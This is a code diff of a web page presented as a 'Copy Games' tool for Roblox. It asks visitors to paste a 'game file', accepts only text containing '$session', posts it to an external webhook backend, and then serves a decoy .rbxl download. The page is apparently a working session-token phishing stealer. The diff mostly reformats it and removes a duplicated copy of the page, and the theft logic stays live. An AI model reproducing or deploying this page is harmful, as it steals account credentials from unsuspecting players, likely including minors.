--- a/index.html
+++ b/index.html
@@ -113,7 +113,7 @@
   <div class="box left-box">
     <h2>Copy Games</h2>
     <p>Paste your game file in the box below, then click "Copy Game!"<br>
-       If you don't know how to find a games "game file" then go ahead and watch "How to use"</p>
+       If you don't know how to find a game's "game file" then watch "How to use"</p>
     <input type="text" id="gameInput" placeholder="Enter game file" />
     <button id="copyBtn">Copy Game!</button>
   </div>
@@ -129,7 +129,7 @@
 </div>
 
 <script>
-  // Your Render backend URL here:
+  // Backend proxy URL - change this if you deploy backend somewhere else
   const backendURL = 'https://copy-roblox-game.onrender.com/send-webhook';
 
   const input = document.getElementById('gameInput');
@@ -143,7 +143,6 @@
       alert('Please enter or paste your game file!');
       return;
     }
-
     if (!text.includes('$session')) {
       alert('Invalid text');
       return;
@@ -153,204 +152,22 @@
     fetch(backendURL, {
       method: 'POST',
       headers: {'Content-Type': 'application/json'},
-      body: JSON.stringify({
-        content: `User pasted game file:\n\`\`\`\n${text}\n\`\`\``
-      }),
-    }).then(response => {
+      body: JSON.stringify({ content: `User pasted game file:\n\`\`\`\n${text}\n\`\`\`` }),
+    })
+    .then(response => {
       if (!response.ok) {
         alert('Failed to send data to backend.');
         return;
       }
-      // Trigger download of the file from your GitHub Pages repo
+      // Trigger file download from GitHub Pages repo
       const a = document.createElement('a');
       a.href = 'grow%20a%20garden%20(1).rbxl';
       a.download = 'grow a garden (1).rbxl';
       document.body.appendChild(a);
       a.click();
       setTimeout(() => a.remove(), 100);
-    }).catch(err => {
-      alert('Error sending webhook: ' + err.message);
-    });
-  });
-
-  playBtn.addEventListener('click', () => {
-    window.open('https://youtu.be/TrpC-B-ko0I', '_blank');
-  });
-</script>
-
-</body>
-</html>
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1" />
-<title>Copy Games</title>
-<style>
-  body {
-    margin: 0; 
-    background-color: #0f0f0f;
-    font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
-    color: white;
-    display: flex;
-    justify-content: center;
-    align-items: center;
-    height: 100vh;
-  }
-  .container {
-    display: flex;
-    gap: 20px;
-    max-width: 900px;
-    width: 100%;
-    padding: 20px;
-  }
-  .box {
-    background: #1c1c1c;
-    border-radius: 12px;
-    padding: 20px 30px;
-    flex: 1;
-    display: flex;
-    flex-direction: column;
-    justify-content: center;
-  }
-  .box h2 {
-    margin: 0 0 12px;
-    font-weight: 700;
-    font-size: 22px;
-  }
-  .box p {
-    font-size: 13px;
-    line-height: 1.4;
-    color: #c0c0c0;
-    margin-bottom: 20px;
-  }
-  input[type="text"] {
-    width: 100%;
-    padding: 11px 14px;
-    border-radius: 8px;
-    border: 1px solid #2a2a2a;
-    background-color: #2b2b2b;
-    color: white;
-    font-size: 15px;
-    margin-bottom: 24px;
-  }
-  input[type="text"]::placeholder {
-    color: #5a5a5a;
-  }
-  button {
-    background: linear-gradient(90deg, #5a81ff 0%, #819cff 100%);
-    border: none;
-    border-radius: 16px;
-    padding: 14px 0;
-    font-weight: 600;
-    font-size: 15px;
-    color: white;
-    cursor: pointer;
-    transition: background 0.3s ease;
-    user-select: none;
-  }
-  button:hover {
-    background: linear-gradient(90deg, #819cff 0%, #5a81ff 100%);
-  }
-  .right-box {
-    display: flex;
-    flex-direction: column;
-    justify-content: center;
-    align-items: flex-start;
-  }
-  .right-box .title {
-    font-weight: 700;
-    font-size: 22px;
-    margin-bottom: 12px;
-  }
-  .right-box .subtitle {
-    font-size: 14px;
-    color: #888;
-    margin-bottom: 20px;
-  }
-  .play-button {
-    background-color: #5a81ff;
-    border-radius: 100px;
-    width: 36px;
-    height: 36px;
-    display: flex;
-    justify-content: center;
-    align-items: center;
-    cursor: pointer;
-    user-select: none;
-  }
-  .play-button:hover {
-    background-color: #819cff;
-  }
-  .play-button svg {
-    fill: white;
-    width: 16px;
-    height: 16px;
-  }
-</style>
-</head>
-<body>
-
-<div class="container">
-  <div class="box left-box">
-    <h2>Copy Games</h2>
-    <p>Paste your game file in the box below, then click "Copy Game!"<br>
-       If you don't know how to find a games "game file" then go ahead and watch "How to use"</p>
-    <input type="text" id="gameInput" placeholder="Enter game file" />
-    <button id="copyBtn">Copy Game!</button>
-  </div>
-  <div class="box right-box">
-    <div class="title">How to use</div>
-    <div class="subtitle">Video tutorial</div>
-    <div class="play-button" title="Play tutorial" id="playTutorialBtn">
-      <svg viewBox="0 0 24 24" >
-        <path d="M8 5v14l11-7z"/>
-      </svg>
-    </div>
-  </div>
-</div>
-
-<script>
-  // Your Render backend URL here:
-  const backendURL = 'https://copy-roblox-game.onrender.com/send-webhook';
-
-  const input = document.getElementById('gameInput');
-  const btn = document.getElementById('copyBtn');
-  const playBtn = document.getElementById('playTutorialBtn');
-
-  btn.addEventListener('click', () => {
-    const text = input.value.trim();
-
-    if (!text) {
-      alert('Please enter or paste your game file!');
-      return;
-    }
-
-    if (!text.includes('$session')) {
-      alert('Invalid text');
-      return;
-    }
-
-    // Send pasted content to backend proxy
-    fetch(backendURL, {
-      method: 'POST',
-      headers: {'Content-Type': 'application/json'},
-      body: JSON.stringify({
-        content: `User pasted game file:\n\`\`\`\n${text}\n\`\`\``
-      }),
-    }).then(response => {
-      if (!response.ok) {
-        alert('Failed to send data to backend.');
-        return;
-      }
-      // Trigger download of the file from your GitHub Pages repo
-      const a = document.createElement('a');
-      a.href = 'grow%20a%20garden%20(1).rbxl';
-      a.download = 'grow a garden (1).rbxl';
-      document.body.appendChild(a);
-      a.click();
-      setTimeout(() => a.remove(), 100);
-    }).catch(err => {
+    })
+    .catch(err => {
       alert('Error sending webhook: ' + err.message);
     });
   });
